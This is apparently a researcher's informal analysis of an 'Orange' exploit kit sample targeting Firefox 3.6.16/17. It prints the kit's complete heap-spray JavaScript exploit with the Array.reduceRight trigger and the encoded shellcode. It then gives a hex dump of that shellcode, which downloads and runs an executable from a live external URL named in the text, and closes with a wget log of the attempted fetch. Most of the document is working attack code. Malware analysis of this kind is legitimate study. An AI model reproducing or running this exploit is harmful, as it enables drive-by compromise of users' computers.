-----------------------------
Firefox Agent Test for the Orange EK;
It is proved it drops mess adjusting to my firefox browser
-----------------------------
document.write("
");
document.write("");
document.write("");
var myobject = document.getElementById('d');
function GetUrl(){
return "
103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!
108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!6
2!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53";
}
;
function myescape(input){
var output = '';
ff = 255;
f = 0;
if (input.length % 2){
f = 1;
}
for (var i = 0; i < input.length; i += 2){
output += '%u';
if (i == (input.length - 1)){
output += 'ff';
}
else {
output = output + input.charCodeAt(i + 1).toString(16);
}
output += input.charCodeAt(i).toString(16);
}
if (!f){
output = output + '%uffff';
}
return output;
}
;
function spray(){
var ptrs = unescape("
%u0000%u0048%u0c00%u5864%u704e%u5349%u587a%u4157%u6844%u564a%u5143%u4359%u7674%u666c%u6a71
%u5174%u4a69%u414e%u4166%u0000%u26f0%u104c%u5846%u426e%u0000%u240c%u3410%u007c%u0c00%u5326
%u1005%u6379%u624a%u7959%u694f%u4663%u4445%u4261%u574b%u6666%u4d71%u7148%u4153%u4b47%u4244
%u6f72%u5942%u655a%u784e%u4a66%u6a68%u4c67%u7879%u002e%u0c00");
var bheader = 0x12 / 2;
var nullt = 0x2 / 2;
var scode = unescape("
%u5eeb%u335f%u99c0%u6a50%ub201%u5745%uf78b%u23b2%udf8b%uda03%u46b2%uda03%ub253%u030a%u8bda
%uaafb%u8b5b%u50fe%u5750%u45b2%ufa03%ub2aa%u0323%ub2fa%u030b%u80fa%u003f%u0175%u5747%u5050
%ub057%u66ff%uffb9%uf2ff%u4fae%u07c6%u5f00%u8b58%ub2fe%u0346%u53fa%uc68b%u5e05%u0000%u5000
%u5656%u466a%u02eb%u79eb%u6a57%u5930%u8b64%u8b01%u0c40%u688b%u8b1c%u085d%u6d8b%u5500%u438b
%u8b3c%u1844%u0b78%u74c0%u8d31%u1874%uad18%uad91%uc303%uad50%u3c8d%uad03%u2c8d%u8b03%u8f74
%u03fc%u33f3%u33c0%u99d2%u03ac%uc1d0%u05c2%u7948%u8bf7%u2474%u3b08%u7416%ue206%u58e2%ueb5d
%u58ba%ub70f%u4d54%u03fe%u901c%u5f5d%ud3ff%uebab%u579d%u7c8b%u0824%u6650%uffb8%uf200%u4fae
%uc033%u0788%u5f58%u04c2%ue800%uff22%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%u1529%u54d2%ufabd
%u4c58%u70cc%u6b77%uf259%u23cb%u6664%u11b4%u1fb1%u1a3e%u6363%u6363%u6363%u652e%u6578%u7500
%u6c72%u6f6d%u2e6e%u6c64%uff6c%u7468%u7074%u2f3a%u642f%u6569%u6573%u2e6c%u6874%u6865%u6369
%u6f6b%u7972%u6f6d%u6f74%u6d72%u6c69%u2e65%u6f63%u3a6d%u3338%u3238%u6f2f%u6873%u6250%u3f59
%u7865%u6970%u3d64%u3331%u6626%u6469%u323d%u36") + unescape(myescape(GetUrl()));
var payload = unescape("
%u6c6e%u706c%u454d%u7453%u4a45%u7554%u616b%u6561%u526f%u7573%u1806%u101f%u828c%u1083%u0d7b
%u103e%u8002%u102d%u876b%u1003%u0001%u1004%u0001%u0000%u6917%u104e%u1000%u0000%uc000%u102a
%u0040%u0000%u0005%u102e%uc001%u102a%u1806%u101f%u9090%u9090%u3401%u102b%u9090%u9090") +
scode;
var tr_padding = unescape("%u0c0c%u0c0c");
while (tr_padding.length < 0x7fa00){
tr_padding += tr_padding;
}
var dummy = ptrs + payload + tr_padding;
var hspray = dummy.substring(0, 0x7fa00 - bheader - nullt);
HeapBlocks = new Array();
for (i = 0; i < 0x100; i ++ ){
HeapBlocks[i] += hspray;
}
}
;
if ((navigator.userAgent.indexOf("Firefox/3.6.16") != - 1) || (navigator.userAgent.
indexOf("Firefox/3.6.17") != - 1)){
spray();
obj = new Array();
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array){
alert(myobj[0]);
}
;
obj.reduceRight(f, 1, 2, 3);
}
-----------------------------
Generating java applet:
-----------------------------
↑There goes the exploit
-----------------------------
Popping he below shellcode;
-----------------------------
eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23
8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa
5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2
0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66
b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03
fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b
5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74
31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad
8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03
d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2
e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f
ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2
ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70
77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63
63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e
64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65
6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f
72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f
73 68 50 62 59 3f 65 78 70 69 64 3d 31 33 26 66
69 64 3d 32
-----------------------------
use kernel.dll & urlmon.dll
-----------------------------
target:
http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13&fid=2
-----------------------------
Download efforts...
-----------------------------
--19:26:05-- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13
=> `oshPbY@expid=13'
Resolving diesel.thehickorymotormile.com... 173.212.222.188
Connecting to diesel.thehickorymotormile.com|173.212.222.188|:8382... connected.
HTTP request sent, awaiting response... 502 Bad Gateway
-----------------------------
Looks like the url is expired :-))
-----------------------------